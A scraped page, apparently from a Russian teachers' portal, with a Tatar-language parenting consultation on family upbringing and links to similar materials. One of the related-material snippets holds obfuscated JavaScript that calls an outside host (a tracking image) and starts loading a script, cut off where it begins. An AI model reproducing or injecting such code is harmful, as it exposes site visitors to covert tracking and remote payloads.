"Бала тәрбияләү гаиләдән башлана"
консультация (средняя, старшая, подготовительная группа)
Рекомендации для родителей на ттарском языке по воспитанию детей в семье.
Скачать:
| Вложение | Размер |
|---|---|
| 20.45 КБ |
Предварительный просмотр:
МББМБУ «ТР Биектау муниципаль районы Ташлы Кавал
«Кояшкай» балалар бакчасы»
Бала тәрбияләү гаиләдән башлана
(Әти-әниләр өчен киңәшләр)
Автор: Iнче кв. категорияле тәрбияче
Гыйлаҗиева Эльза Габделхак кызы
“... Балалар – безнең киләчәгебез. Дөрес тәрбия бирү – ул безнең бәхетле картлык, яман тәрбия – безнең кайгы, күз яшьләре, башка кешеләр һәм ил алдындагы гаеп”, дигән бөек педагог А.Макаренко.
Бала күңеле – ак кәгазь, -диләр. Менә шушы кәгазьдә ни язасың, нинди эзләр калдырасың, шундый бала үсә. Иң беренче рольне бу эштә гаилә үти.
Баланың акыл үсеш, холкы үзенчәлекләре сабый чактан ук формалаша башлый. Моңа гаиләдән гомуми тәртип, андагы узара мөнәсәбәтләр гаять зур йогынты ясый. Чөнки өченче яшендә үк ул уз тирәсендәге кешеләргә охшарга тырыша.
Һәр әти – әнисе һәм гаиләнең башка әгъзалары бер – берсенә ягымлы, кайгыртучан һәм ихтирамлы мөнәсәбәттә булсалар, тәртип һәм хезмәт яратсалар, бала да ул сыйфатларны яхшы үзләштерә. Тикмәгә генә: «Яхшы үрнәк – иң яхшы ….»,- димиләр бит. Бала, беренче чиратта, гаиләдә тәрбияләнә.
Кайбер гаиләдә балага тәләпчәнлек җитми, яисә, киресенчә юк кына гаеп өчен дә җәза бирелә, кирәкмәгән вакытта иркәләү сүзләре әйтелә. Ата белән ана уртак фикердә түгел, җитмәсә, йомшак күңелле әби һәм бабай баланың бөтен гаебен гафу итәргә әзер тора
Кечкенәләр, гадәттә, өлкәннәр эшләгәнне кабатлый. Шуңа күрә «Балалардан таләп иткәнче – үзеннән таләп ит»,- дигән әйтем еш кулланыла.
“Сүз белән үтереп була, сүз белән терелтеп була”. В.Сухомлинский әйтүе буенча, балага әйтелгән сүз иң элек кешелекле, сизгер, сабыр булырга тиеш. Еш кына балалар белән аралашуда боерык тоны, кисәтүләр, шелтәләр, кискен характеристика хөкем итә. Киңәш, теләк, үтенеч бик сирәк кулланыла.
Төрле аңлашылмаучанлык аркасында бала белән ызгыш килеп чыгарга мөмкин. Мондый вакытта бала белән тыныч кына сөйләшергә кирәк, тикшерергә, бәлки бала, сез белмәгән кыенлыклар алдында торадыр.
Ата – ана хакы, күрше хакы, ятимнәр хакы, милләт хакы дигән, төшенчәләрне бала күңеленә сеңдереп үстерергә кирәк, чөнки әниләр безне сулышлары белән җылыталар, назлары белән иркәлиләр,гөмерләре буенча безнең өчен сынамышлар, безнең өчен чәч агарталар – без аларны нихәтле хакларга тырышсакта, хаклап бетәрә амыйбыз. Юкка гына: «Ана өчен уч төбендә тәбә куарсың да, хакын хаклап бетерә алмыйсың»- димиләр. Моны башкаларның акылына гына түгел, җаннарынада сеңдерү зарур.
Ата хакы да тәңре хакы белән тиңләнә, чөнки бәләләрдән, авыклардан йолучы, коткаручы, чарасыз чакта юлын табучы кеше ул ир –ат.
Эш алымнары, төрле чаралар турында күп сөйләргә мөмкин, ләкин иң мөһим ата – ананың шәхси үрнәк, гаилә традицияләре. Билгеле, һәр гаиләнең үз үрнәге, үз кайгысы, үз шатлыгы, үз тәҗрибәсе бар. Әмма дуслык, иптәшлек, узара аңлашу, ярату, ярдәмләшү кирәк.
Ә әби – бабайлар? Ил аналар, ил аталары. Алар безнең киңәшчеләребез, алар безгә борынгылар йоласын саклап, безне киләчәк буыннарга тоташтыручылар.
Бала гомере буе гаиләдә генә ятмый. Шуңа күрә балаларда тискәре күренешләргә үзенең мөнәсәбәтен булдырырга, кешегә ярдәм итә белергә, үзендә һәм башкалардагы начар гадәтләрне бетерә белү күнекмәләре тәрбияәргә кирәк.
По теме: методические разработки, презентации и конспекты
Гаиләдә баланы тәрбияләү Һәр сабый тумыштан килә торган үзенчәлекләргә ия, әмма аның нинди булып үсүе нигездә тәрбиягә бәйле. Баланың акыл үсеше, әхлакый сыйфатлары , тирә-юньдәгеләргә мөнәсәбәте, барысыннан да элек , гаиләдә формалаша.
Һәр сабый тумыштан килә торган үзенчәлекләргә ия, әмма аның нинди булып үсүе нигездә тәрбиягә бәйле. Баланың акыл үсеше, әхлакый сыйфатлары , тирә-юньдәгеләргә мөнәсәбәте, барысыннан да элек , г...

Тәрбия гаиләдән башлана
Бу язмада ата - аналарга балаларны әдәпле, мәрхәмәтле итеп тәрбияләү өчен киңәшләр бирелә....

Әти – әниләр өчен киңәшләр «Тәрбия гаиләдән башлана » Кечкенәләр төркеме
Әти – әниләр өчен киңәшләр«Тәрбия гаиләдән башлана »Кечкенәләр төркеме...

Әти – әниләр өчен киңәшләр «Тәрбия гаиләдән башлана »
Әти – әниләр өчен киңәшләр«Тәрбия гаиләдән башлана »...
Әти – әниләр өчен киңәшләр «Тәрбия гаиләдән башлана » Кечкенәләр төркеме
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'hlzeeb.lussoit.com\',\'39\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.creat...
«Гаиләдә - бала тәрбияләү»
laquo;Гаиләдә - бала тәрбияләү»(әти-әниләр өчен чыгыш) Гаилә – тормышыбыз нигезе. Гаилә нык, тату икән, димәк, дәүләт тә, җәмгыять тә нык, тату дигән сүз. Әти -әни аның тоткасы булса...
"Әти-әниләр белән әңгәмә. Тәрбия гаиләдэн башлана."
Һәр тәрбияче һәм ата- ана үзенең баласының сәламәт һәм бәхетле булуын тели һәм шуңа ирешүне максат итеп куя. Әмма барыбыз да балаларны ничек итеп әдәпле, тирә - як мөхиткә, табигатькә игь...
